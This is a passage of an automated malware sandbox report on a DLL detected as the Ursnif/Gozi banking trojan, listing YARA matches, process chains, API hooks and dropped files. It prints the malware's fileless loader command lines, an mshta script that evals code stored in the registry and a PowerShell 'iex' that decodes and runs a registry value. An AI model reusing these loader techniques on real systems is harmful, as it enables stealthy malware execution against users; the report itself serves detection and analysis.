Source: C:\Windows\System32\control.exe Code function: 34_2_001B75B4 34_2_001B75B4
Source: C:\Windows\System32\control.exe Code function: 34_2_001B15A0 34_2_001B15A0
Source: C:\Windows\System32\control.exe Code function: 34_2_001B7DDC 34_2_001B7DDC
Source: C:\Windows\System32\control.exe Code function: 34_2_001ABE9C 34_2_001ABE9C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2F1C 34_2_001A2F1C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A4F5C 34_2_001A4F5C
Source: C:\Windows\System32\control.exe Code function: 34_2_001AEF7C 34_2_001AEF7C
Source: C:\Windows\System32\control.exe Code function: 34_2_00193F98 34_2_00193F98
Source: C:\Windows\System32\control.exe Code function: 34_2_001BEFD0 34_2_001BEFD0
Source: C:\Windows\System32\control.exe Code function: 34_2_001A97C8 34_2_001A97C8
Source: C:\Windows\explorer.exe Code function: 37_2_03B66B80 37_2_03B66B80
Source: C:\Windows\explorer.exe Code function: 37_2_03B542CC 37_2_03B542CC
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B65890 37_2_03B65890
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 37_2_03B67500
Source: C:\Windows\explorer.exe Code function: 37_2_03B63438 37_2_03B63438
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C458 37_2_03B5C458
Source: C:\Windows\explorer.exe Code function: 37_2_03B63BF4 37_2_03B63BF4
Source: C:\Windows\explorer.exe Code function: 37_2_03B753D4 37_2_03B753D4
Source: C:\Windows\explorer.exe Code function: 37_2_03B5EBD0 37_2_03B5EBD0
Source: C:\Windows\explorer.exe Code function: 37_2_03B72BD8 37_2_03B72BD8
Source: C:\Windows\explorer.exe Code function: 37_2_03B60304 37_2_03B60304
Source: C:\Windows\explorer.exe Code function: 37_2_03B52B40 37_2_03B52B40
Source: C:\Windows\explorer.exe Code function: 37_2_03B70294 37_2_03B70294
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A28 37_2_03B76A28
Source: C:\Windows\explorer.exe Code function: 37_2_03B7FA10 37_2_03B7FA10
Source: C:\Windows\explorer.exe Code function: 37_2_03B549BC 37_2_03B549BC
Source: C:\Windows\explorer.exe Code function: 37_2_03B611DC 37_2_03B611DC
Source: C:\Windows\explorer.exe Code function: 37_2_03B7E09C 37_2_03B7E09C
Source: C:\Windows\explorer.exe Code function: 37_2_03B578F0 37_2_03B578F0
Source: C:\Windows\explorer.exe Code function: 37_2_03B7E038 37_2_03B7E038
Source: C:\Windows\explorer.exe Code function: 37_2_03B6E808 37_2_03B6E808
Source: C:\Windows\explorer.exe Code function: 37_2_03B6386C 37_2_03B6386C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6206C 37_2_03B6206C
Source: C:\Windows\explorer.exe Code function: 37_2_03B62854 37_2_03B62854
Source: C:\Windows\explorer.exe Code function: 37_2_03B53F98 37_2_03B53F98
Source: C:\Windows\explorer.exe Code function: 37_2_03B7EFD0 37_2_03B7EFD0
Source: C:\Windows\explorer.exe Code function: 37_2_03B697C8 37_2_03B697C8
Source: C:\Windows\explorer.exe Code function: 37_2_03B62F1C 37_2_03B62F1C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6EF7C 37_2_03B6EF7C
Source: C:\Windows\explorer.exe Code function: 37_2_03B64F5C 37_2_03B64F5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6BE9C 37_2_03B6BE9C
Source: C:\Windows\explorer.exe Code function: 37_2_03B775B4 37_2_03B775B4
Source: C:\Windows\explorer.exe Code function: 37_2_03B715A0 37_2_03B715A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B5559C 37_2_03B5559C
Source: C:\Windows\explorer.exe Code function: 37_2_03B77DDC 37_2_03B77DDC
Source: C:\Windows\explorer.exe Code function: 37_2_03B51D20 37_2_03B51D20
Source: C:\Windows\explorer.exe Code function: 37_2_03B59514 37_2_03B59514
Source: C:\Windows\explorer.exe Code function: 37_2_03B61D14 37_2_03B61D14
Source: C:\Windows\explorer.exe Code function: 37_2_03B7ED7C 37_2_03B7ED7C
Source: C:\Windows\explorer.exe Code function: 37_2_03B70D40 37_2_03B70D40
Source: C:\Windows\explorer.exe Code function: 37_2_03B574A8 37_2_03B574A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B5DC88 37_2_03B5DC88
Source: C:\Windows\explorer.exe Code function: 37_2_03B644FC 37_2_03B644FC
Source: C:\Windows\explorer.exe Code function: 37_2_03B79C04 37_2_03B79C04
Source: C:\Windows\explorer.exe Code function: 37_2_03B71C68 37_2_03B71C68
Source: C:\Windows\explorer.exe Code function: 37_2_03B7D468 37_2_03B7D468
PE file does not import any functions
Source: idzehqcm.dll.32.dr Static PE information: No import functions for PE file found
Source: jnnfehtw.dll.28.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: msfte.dll
Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: mstracer.dll
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@30/156@13/4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_001C31DD
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FC0EA453-7035-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{F267487C-A9A6-F4BF-C346-ED68A7DA711C}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{EE061CAF-7521-5044-6F02-79841356BDF8}
Source: C:\Windows\System32\RuntimeBroker.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6A2E9FEC-C18A-2CE5-9B3E-8520FF528954}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF514DA3B5643F29A2.TMP Jump to behavior
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll ReversingLabs: Detection: 13%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82968 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17432 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82968 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17432 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001C.00000002.404227102.000001796D8A0000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.416522356.0000024FD6D20000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00E5505D
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CAF23 push ecx; ret 1_2_001CAF33
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CABF0 push ecx; ret 1_2_001CABF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E7769F push ecx; ret 1_2_00E776AF
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C115 push 3B000001h; retf 34_2_0019C11A
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C115 push 3B000001h; retf 37_2_03B5C11A
Source: initial sample Static PE information: section name: .text entropy: 6.87914739574

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
